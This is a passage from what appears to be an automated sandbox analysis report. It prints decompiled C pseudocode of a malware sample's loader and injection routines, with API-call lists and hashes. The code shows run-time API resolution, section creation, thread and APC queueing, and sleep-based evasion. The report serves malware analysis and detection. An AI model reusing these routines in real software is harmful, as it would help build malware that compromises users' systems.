                                                                                                                                                                                                                                										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                                                                                										_t46 = E00A612E2(_t56, _a12); // executed
                                                                                                                                                                                                                                										_v8 = _t46;
                                                                                                                                                                                                                                										if(_t46 != 0) {
                                                                                                                                                                                                                                											goto L8;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											 *_a16 = _t56;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v8;
                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                0x00a61d19
                                                                                                                                                                                                                                0x00a61d1e
                                                                                                                                                                                                                                0x00a61d23
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61d25
                                                                                                                                                                                                                                0x00a61d28
                                                                                                                                                                                                                                0x00a61d28
                                                                                                                                                                                                                                0x00a61d23
                                                                                                                                                                                                                                0x00a61d06
                                                                                                                                                                                                                                0x00a61cf0
                                                                                                                                                                                                                                0x00a61cda
                                                                                                                                                                                                                                0x00a61cc4
                                                                                                                                                                                                                                0x00a61cae
                                                                                                                                                                                                                                0x00a61d42

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A62020: HeapAlloc.KERNEL32(00000000,?,00A61593,00000030,747863F0,00000000), ref: 00A6202C
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00A61FB8,?,?,?,?,?,00000002,?,?), ref: 00A61C85
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00A61CA7
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00A61CBD
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00A61CD3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00A61CE9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00A61CFF
                                                                                                                                                                                                                                  • Part of subcall function 00A612E2: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 00A6133F
                                                                                                                                                                                                                                  • Part of subcall function 00A612E2: memset.NTDLL ref: 00A61361
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1632424568-0
                                                                                                                                                                                                                                • Opcode ID: e4962205b56823800abba53a4dfd324f927a962b21c3e5c661b97398626aed48
                                                                                                                                                                                                                                • Instruction ID: f0ddacea98a6dfcc22d6432d6d8d0c9c9a520dcd2f198482e82d91dba02de54a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4962205b56823800abba53a4dfd324f927a962b21c3e5c661b97398626aed48
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD217CB1604A0AEFD711DFB9DD80D6ABBFCAF05300B054666E545C7251D774ED05CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                                                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                				char _t9;
                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                				_t9 = _a8;
                                                                                                                                                                                                                                				_v8 = 1;
                                                                                                                                                                                                                                				if(_t9 == 0) {
                                                                                                                                                                                                                                					_t10 = InterlockedDecrement(0xa64188);
                                                                                                                                                                                                                                					__eflags = _t10;
                                                                                                                                                                                                                                					if(_t10 == 0) {
                                                                                                                                                                                                                                						__eflags =  *0xa6418c;
                                                                                                                                                                                                                                						if( *0xa6418c != 0) {
                                                                                                                                                                                                                                							_t36 = 0x2328;
                                                                                                                                                                                                                                							while(1) {
                                                                                                                                                                                                                                								SleepEx(0x64, 1);
                                                                                                                                                                                                                                								__eflags =  *0xa64198;
                                                                                                                                                                                                                                								if( *0xa64198 == 0) {
                                                                                                                                                                                                                                									break;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t36 = _t36 - 0x64;
                                                                                                                                                                                                                                								__eflags = _t36;
                                                                                                                                                                                                                                								if(_t36 > 0) {
                                                                                                                                                                                                                                									continue;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							CloseHandle( *0xa6418c);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						HeapDestroy( *0xa64190);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					if(_t9 == 1 && InterlockedIncrement(0xa64188) == 1) {
                                                                                                                                                                                                                                						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                						 *0xa64190 = _t18;
                                                                                                                                                                                                                                						_t41 = _t18;
                                                                                                                                                                                                                                						if(_t18 == 0) {
                                                                                                                                                                                                                                							L6:
                                                                                                                                                                                                                                							_v8 = 0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							 *0xa641b0 = _a4;
                                                                                                                                                                                                                                							asm("lock xadd [eax], edi");
                                                                                                                                                                                                                                							_t23 = E00A61000(E00A61EB4, E00A61971(_a12, 1, 0xa64198, _t41),  &_a8);
                                                                                                                                                                                                                                							 *0xa6418c = _t23;
                                                                                                                                                                                                                                							if(_t23 == 0) {
                                                                                                                                                                                                                                								asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                								goto L6;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v8;
                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                0x00a61409
                                                                                                                                                                                                                                0x00a6140e
                                                                                                                                                                                                                                0x00a61410
                                                                                                                                                                                                                                0x00a6144c
                                                                                                                                                                                                                                0x00a6144c
                                                                                                                                                                                                                                0x00a61412
                                                                                                                                                                                                                                0x00a6141a
                                                                                                                                                                                                                                0x00a61421
                                                                                                                                                                                                                                0x00a61437
                                                                                                                                                                                                                                0x00a6143c
                                                                                                                                                                                                                                0x00a61443
                                                                                                                                                                                                                                0x00a61448
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61448
                                                                                                                                                                                                                                0x00a61443
                                                                                                                                                                                                                                0x00a61410
                                                                                                                                                                                                                                0x00a613e3
                                                                                                                                                                                                                                0x00a614a5

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(00A64188), ref: 00A613EE
                                                                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00A61403
                                                                                                                                                                                                                                  • Part of subcall function 00A61000: CreateThread.KERNEL32 ref: 00A61017
                                                                                                                                                                                                                                  • Part of subcall function 00A61000: QueueUserAPC.KERNEL32(?,00000000,?), ref: 00A6102C
                                                                                                                                                                                                                                  • Part of subcall function 00A61000: GetLastError.KERNEL32(00000000), ref: 00A61037
                                                                                                                                                                                                                                  • Part of subcall function 00A61000: TerminateThread.KERNEL32(00000000,00000000), ref: 00A61041
                                                                                                                                                                                                                                  • Part of subcall function 00A61000: CloseHandle.KERNEL32(00000000), ref: 00A61048
                                                                                                                                                                                                                                  • Part of subcall function 00A61000: SetLastError.KERNEL32(00000000), ref: 00A61051
                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(00A64188), ref: 00A61456
                                                                                                                                                                                                                                • SleepEx.KERNEL32(00000064,00000001), ref: 00A61470
                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 00A6148C
                                                                                                                                                                                                                                • HeapDestroy.KERNEL32 ref: 00A61498
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2110400756-0
                                                                                                                                                                                                                                • Opcode ID: bbe0f42bd1ed5af7460f741e5d1f4e7db1cdf759f37f96ccc9a3a480264521de
                                                                                                                                                                                                                                • Instruction ID: 8886d425cc46da0062da87eae28a691f003a1f9248b1652516d4c6111717cefd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbe0f42bd1ed5af7460f741e5d1f4e7db1cdf759f37f96ccc9a3a480264521de
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B2172B2700205FFCB10DFE9ED889697FB8FB5A7617198625F505E3150EAB08E468B50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E00A94D07(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                				struct _FILETIME _v12;
                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                				int _t14;
                                                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                				unsigned int _t23;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                				signed int _t34;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t27 = __edx;
                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                				 *0xa9d270 = _t10;
                                                                                                                                                                                                                                				if(_t10 != 0) {
                                                                                                                                                                                                                                					 *0xa9d160 = GetTickCount();
                                                                                                                                                                                                                                					_t12 = E00A96246(_a4);
                                                                                                                                                                                                                                					if(_t12 == 0) {
                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                							GetSystemTimeAsFileTime( &_v12);
                                                                                                                                                                                                                                							_t14 = SwitchToThread();
                                                                                                                                                                                                                                							_t23 = _v12.dwHighDateTime;
                                                                                                                                                                                                                                							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push(0x13);
                                                                                                                                                                                                                                							_push(_t23 >> 5);
                                                                                                                                                                                                                                							_push(_t16);
                                                                                                                                                                                                                                							L00A9B01E();
                                                                                                                                                                                                                                							_t34 = _t14 + _t16;
                                                                                                                                                                                                                                							_t18 = E00A9120C(_a4, _t34);
                                                                                                                                                                                                                                							_t19 = 3;
                                                                                                                                                                                                                                							_t26 = _t34 & 0x00000007;
                                                                                                                                                                                                                                							Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                                                                                                                                                                                                                						} while (_t18 == 1);
                                                                                                                                                                                                                                						if(E00A975DD(_t26) != 0) {
                                                                                                                                                                                                                                							 *0xa9d298 = 1; // executed
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t12 = E00A95701(_t27); // executed
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t12 = 8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t12;
                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,00A95992,?), ref: 00A94D1A
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A94D2E
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00A95992,?), ref: 00A94D4A
                                                                                                                                                                                                                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,00A95992,?), ref: 00A94D50
                                                                                                                                                                                                                                • _aullrem.NTDLL(?,?,00000013,00000000), ref: 00A94D6D
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,00A95992,?), ref: 00A94D8A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 507476733-0
                                                                                                                                                                                                                                • Opcode ID: 28e9e229b919c57e9f13be583a21934e3ee5cafc38d143a1e912cc85597c1051
                                                                                                                                                                                                                                • Instruction ID: 7e2e39ebac9822a965a3c457e4c81204cfc1f5453f10eb40c1d277ea455b01b4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28e9e229b919c57e9f13be583a21934e3ee5cafc38d143a1e912cc85597c1051
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9611E976750704ABDB10ABF4DD4AF9A77E8EB48361F500126FA15C6190FF70D5428760
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 61%
                                                                                                                                                                                                                                			E00A9202A(void* __eax) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				char* _t40;
                                                                                                                                                                                                                                				long _t41;
                                                                                                                                                                                                                                				void* _t44;
                                                                                                                                                                                                                                				intOrPtr _t45;
                                                                                                                                                                                                                                				intOrPtr* _t46;
                                                                                                                                                                                                                                				char _t48;
                                                                                                                                                                                                                                				long _t52;
                                                                                                                                                                                                                                				char* _t53;
                                                                                                                                                                                                                                				long _t54;
                                                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                                                				void* _t64;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t64 = __eax;
                                                                                                                                                                                                                                				_t40 =  &_v12;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40); // executed
                                                                                                                                                                                                                                				if(_t40 == 0) {
                                                                                                                                                                                                                                					_t41 = GetLastError();
                                                                                                                                                                                                                                					_v8 = _t41;
                                                                                                                                                                                                                                					if(_t41 != 0x2efe) {
                                                                                                                                                                                                                                						L26:
                                                                                                                                                                                                                                						return _v8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                					L25:
                                                                                                                                                                                                                                					 *((intOrPtr*)(_t64 + 0x30)) = 0;
                                                                                                                                                                                                                                					goto L26;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_v12 == 0) {
                                                                                                                                                                                                                                					goto L25;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t44 =  *0xa9d130(0, 1,  &_v24); // executed
                                                                                                                                                                                                                                				if(_t44 != 0) {
                                                                                                                                                                                                                                					_v8 = 8;
                                                                                                                                                                                                                                					goto L26;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t45 = E00A95157(0x1000);
                                                                                                                                                                                                                                				_v20 = _t45;
                                                                                                                                                                                                                                				if(_t45 == 0) {
                                                                                                                                                                                                                                					_v8 = 8;
                                                                                                                                                                                                                                					L21:
                                                                                                                                                                                                                                					_t46 = _v24;
                                                                                                                                                                                                                                					 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                                                                                                                                                                                                					goto L26;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                						L4:
                                                                                                                                                                                                                                						_t48 = _v12;
                                                                                                                                                                                                                                						if(_t48 >= 0x1000) {
                                                                                                                                                                                                                                							_t48 = 0x1000;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
                                                                                                                                                                                                                                						if(_t48 == 0) {
                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t55 = _v24;
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
                                                                                                                                                                                                                                						_t17 =  &_v12;
                                                                                                                                                                                                                                						 *_t17 = _v12 - _v16;
                                                                                                                                                                                                                                						if( *_t17 != 0) {
                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L10:
                                                                                                                                                                                                                                						if(WaitForSingleObject( *0xa9d2a4, 0) != 0x102) {
                                                                                                                                                                                                                                							_v8 = 0x102;
                                                                                                                                                                                                                                							L18:
                                                                                                                                                                                                                                							E00A953BB(_v20);
                                                                                                                                                                                                                                							if(_v8 == 0) {
                                                                                                                                                                                                                                								_t52 = E00A950DE(_v24, _t64); // executed
                                                                                                                                                                                                                                								_v8 = _t52;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L21;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t53 =  &_v12;
                                                                                                                                                                                                                                						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53); // executed
                                                                                                                                                                                                                                						if(_t53 != 0) {
                                                                                                                                                                                                                                							goto L15;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t54 = GetLastError();
                                                                                                                                                                                                                                						_v8 = _t54;
                                                                                                                                                                                                                                						if(_t54 != 0x2f78 || _v12 != 0) {
                                                                                                                                                                                                                                							goto L18;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_v8 = 0;
                                                                                                                                                                                                                                							goto L15;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_v8 = GetLastError();
                                                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                                                					L15:
                                                                                                                                                                                                                                				} while (_v12 != 0);
                                                                                                                                                                                                                                				goto L18;
                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A9214A
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A920BE
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000), ref: 00A920CE
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A920EE
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 35602742-1701360479
                                                                                                                                                                                                                                • Opcode ID: 15f9620144b975d833c73b08f01f94eeb46ec2605ece1901a3f8f9b1c3709dc0
                                                                                                                                                                                                                                • Instruction ID: 75aa8a22aa76a1ab6686217b674aabe13fd349bf2a5a943709bef2e64e6fc6b4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15f9620144b975d833c73b08f01f94eeb46ec2605ece1901a3f8f9b1c3709dc0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5941F874A00209FFDF20DFE4D989AAEBBB9FB04304F20456AE502E7251DB319E55DB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                                			E00A945CF(void** __esi) {
                                                                                                                                                                                                                                				intOrPtr _v0;
                                                                                                                                                                                                                                				intOrPtr _t4;
                                                                                                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                				intOrPtr _t10;
                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                				void** _t13;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t13 = __esi;
                                                                                                                                                                                                                                				_t4 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                				__imp__(_t4 + 0x40);
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_t6 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                                                                                                                					if( *_t1 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					Sleep(0xa);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t8 =  *_t13;
                                                                                                                                                                                                                                				if(_t8 != 0 && _t8 != 0xa9d030) {
                                                                                                                                                                                                                                					HeapFree( *0xa9d270, 0, _t8);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t9 = E00A95341(_v0, _t13); // executed
                                                                                                                                                                                                                                				_t13[1] = _t9;
                                                                                                                                                                                                                                				_t10 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                				_t11 = _t10 + 0x40;
                                                                                                                                                                                                                                				__imp__(_t11);
                                                                                                                                                                                                                                				return _t11;
                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(04FD9570), ref: 00A945D8
                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,00A95884), ref: 00A945E2
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,00A95884), ref: 00A9460A
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(04FD9570), ref: 00A94626
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 58946197-1536154274
                                                                                                                                                                                                                                • Opcode ID: 667dadb85b1a3fb58d868f0de3116c6d0104863d3f000f8f0e19af80692ad7f0
                                                                                                                                                                                                                                • Instruction ID: 947c2b4acb4e641a27cf026d493ac010625a63e7efbd0fea315a15b7da6a8ecd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 667dadb85b1a3fb58d868f0de3116c6d0104863d3f000f8f0e19af80692ad7f0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87F0DA70704640EBDF24DFE9EE49F177BE4AB15745F054416F501CB261CB20E992CB25
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                			E00A95701(signed int __edx) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				CHAR* _v16;
                                                                                                                                                                                                                                				long _v20;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                				CHAR* _t22;
                                                                                                                                                                                                                                				CHAR* _t25;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                				void* _t31;
                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                				CHAR* _t36;
                                                                                                                                                                                                                                				CHAR* _t42;
                                                                                                                                                                                                                                				CHAR* _t43;
                                                                                                                                                                                                                                				CHAR* _t44;
                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                                                				CHAR* _t54;
                                                                                                                                                                                                                                				signed char _t56;
                                                                                                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                                                                                                				signed int _t59;
                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                				CHAR* _t65;
                                                                                                                                                                                                                                				CHAR* _t66;
                                                                                                                                                                                                                                				char* _t67;
                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t61 = __edx;
                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                                				_t21 = E00A92CC9();
                                                                                                                                                                                                                                				if(_t21 != 0) {
                                                                                                                                                                                                                                					_t59 =  *0xa9d294; // 0x4000000a
                                                                                                                                                                                                                                					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                					 *0xa9d294 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t22 =  *0xa9d12c(0, 2); // executed
                                                                                                                                                                                                                                				_v16 = _t22;
                                                                                                                                                                                                                                				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                                                                                                                					_t25 = E00A92A45( &_v8,  &_v20); // executed
                                                                                                                                                                                                                                					_t54 = _t25;
                                                                                                                                                                                                                                					_t26 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                					if( *0xa9d294 > 5) {
                                                                                                                                                                                                                                						_t8 = _t26 + 0xa9e5cd; // 0x4d283a53
                                                                                                                                                                                                                                						_t27 = _t8;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t7 = _t26 + 0xa9e9f9; // 0x44283a44
                                                                                                                                                                                                                                						_t27 = _t7;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					E00A9276B(_t27, _t27);
                                                                                                                                                                                                                                					_t31 = E00A91DF5(_t61,  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                					if(_t31 == 0) {
                                                                                                                                                                                                                                						CloseHandle(_v20);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t62 = 5;
                                                                                                                                                                                                                                					if(_t54 != _t62) {
                                                                                                                                                                                                                                						 *0xa9d2a8 =  *0xa9d2a8 ^ 0x81bbe65d;
                                                                                                                                                                                                                                						_t32 = E00A95157(0x60);
                                                                                                                                                                                                                                						 *0xa9d364 = _t32;
                                                                                                                                                                                                                                						__eflags = _t32;
                                                                                                                                                                                                                                						if(_t32 == 0) {
                                                                                                                                                                                                                                							_push(8);
                                                                                                                                                                                                                                							_pop(0);
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							memset(_t32, 0, 0x60);
                                                                                                                                                                                                                                							_t49 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                							_t68 = _t68 + 0xc;
                                                                                                                                                                                                                                							__imp__(_t49 + 0x40);
